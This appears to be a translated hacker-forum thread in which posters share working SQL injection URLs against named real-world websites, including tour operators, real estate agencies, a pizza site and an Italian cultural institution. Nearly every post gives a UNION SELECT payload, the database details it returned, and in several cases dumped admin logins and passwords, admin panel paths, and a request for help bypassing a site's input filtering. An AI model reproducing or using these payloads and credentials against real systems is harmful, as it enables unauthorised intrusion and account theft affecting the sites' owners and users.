HTML: http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,admin,6,nick,icq,9+from+algi_users/* HTML: http://www.algi.hdwao.pl/comment.php?what=article&id=12+UNION+SELECT+1,2,pass,4,5,6,nick,icq,9+from+poezje_users/* DB 5
dinaitour.com - tourism in Ukraine 4.1.20dinaitourdinaitour@localhost Code: http://www.dinaitour.com/tourism/tour/ukraine/?tour=3&sub=-1+union+select+1,concat_ws(0x05,version(),database(),user()),3,4/*
nadejda.com.ua - real estate agency 5.0.45-lognadejda_nadejdanadejda_unadejda@localhost Code: http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,version(),database(),user()),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38/* http://www.nadejda.com.ua/index.php?page=list&prm=sale&x=&city=-1)+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,concat_ws(0x05,TABLE_SCHEMA,TABLE_NAME,COLUMN_NAME),15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38+from+information_schema.columns/* cities constypes flattypes main maps objects typetypes
pizzamarketplace.com - Pizza Marketplace 4.0.27-standardsitedbatmmarketplace@localhost Code: http://www.pizzamarketplace.com/research.php?rc_id=-1+union+select+concat_ws(0x05,version(),database(),user()),2,3,4,5,6,7,8,9/* Hungry?
A series of sites made by the Granite5 studio
P.S.: By the way, this is far from the complete list of sites... Almost half!
Code: http://www.colorprint.ru/index.php?id=-37+union+select+concat_ws(0x2F,version(),user(),database()),2,3,4,5,6,7/* 4.0.26/[email protected]/colorprintru
HTML: http://www.greenshift.com/news.php?id=-97+UNION+SELECT+1,user,password,4,5,6,7,8,9,10,11,12+from+mysql.user/*
And here are some more noobs )) imagine, the admin's pass was 1234: http://www.apollo-tour.ru/ admin:1234 the admin panel, as usual: http://www.apollo-tour.ru/admin/index.php
Code: http://michaelyoun.com/index.php?id=335+union+select+1,concat(login,0x7c,pass),3,4,5,concat_ws(0x2F,version(),user(),database())+from+users+limit+3,3//* Version : 4.0.17-standard/[email protected]/michael132576
Then delete it... there's no need to post screenshots here... if everyone starts dropping screenshots, who knows what a mess it will turn into. HTML: http://www.thaitrademe.com/classifieds/product_desc.php?id=-4871+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27/* DB 5 HTML: http://www.classifiedbiz.com/product_desc.php?id=4635+UNION+SELECT+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26/* DB 4 HTML: http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(admin_name,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_admin/* HTML: http://sigpig.com/product_desc.php?id=-139+UNION+SELECT+1,2,concat(username,0x3b,pwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36+from+sbauctions_members/* DB 5
Code: http://ukrfoto.dp.ua/download.php?id=-166+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6/* ukrfoto@saturn/4.1.22-log/ukrfoto 3
Code: http://www.heroesworld.ru/files.php?section=9999999'+union+select+1,concat_ws(0x2F,user(),version()%20%20,database())/* heroesv_bdu@localhost/4.1.20/heroesv_main Works only with 9999999.
Real estate agency «ИНСАЙД НОРД ВЕСТ» Code: http://www.i-nw.ru/news.php?id=9999+union+select+1,version(),3,4,concat(login,char(58),password),6,7+from+users/* Version 4.1.20-log/[email protected]/db_insidenw_1 Admins secretar:123 luoman:12345 fin:f2inw
Code: http://www.roguegovernment.com/news.php?id=-4682+union+select+1,version(),aes_decrypt(aes_encrypt(concat(user,0x3a,password),0x3a),0x3a),4,5,6+from+mysql.user/* Version root@localhost/4.1.7/roguegovernment Admins: root:6aee13f5467031e6
Code: http://www.pro-tour.ru/news.php?id=772+union+select+1,concat_ws(0x2F,user(),version(),database()),3,4,5,6,7/* protour@19 ---------------------------------------------------------------------------------------------------------- Code: http://www.clarionrus.ru/news.php?id=-51+union+select+1,2,3,concat_ws(0x2F,version(),user(),database()),5,6/* 4.1.20-lk-log/clarionrus@localhost/clarionrus
triennale.it Code: http://www.triennale.it/index.php?lang=_eng&id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,version(),database(),user()),43,44,45,46,47,48,49,50/* 55 tables: Code: http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,table_name,43,44,45,46,47,48,49,50+from+information_schema.tables+limit+54,1/* As far as I understand, the admin table is utenti_gestionale: Code: http://www.triennale.it/index.php?id=1&tbl=0&idq=-1+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,concat_ws(0x3a,id_utente,password),43,44,45,46,47,48,49,50+from+utenti_gestionale+limit+0,1/* Its fields: Code: id_utente password grado There are three admins, "login:pass": Code: triennale:Triennale_6 biglietteria:TrMilano biglietteriaTBVS:TBVS_ The site has a SHOP; whoever is interested, dig further (Italian and I don't really get along!).
Code: http://www.getsalt.com/news.php?id=-117+union+select+1,2,concat_ws(0x2F,version(),user(),database()),4,5,6,concat_ws(char(58,58),username,password,id),8,9,10,11,12+from+fb_users+limit+3,3/* Data: 5.0.22-log/getsalt@localhost/getsalt Admins: Login Password ID Anneleen test123 2 kikivreeling vre27kik 19
Question! The site atdr.ro: Code: http://atdr.ro/index.php?id=-1/**/union/**/select/**/1,2,version(),4,5,6,7,8,9,10,11/* I got around the "+" filtering, but I can't manage concat at all. How do I get around it? Also: when guessing tables, there is a strange reaction to a request for the user_password field from mysql.user. Whoever digs deeper, post back (+)!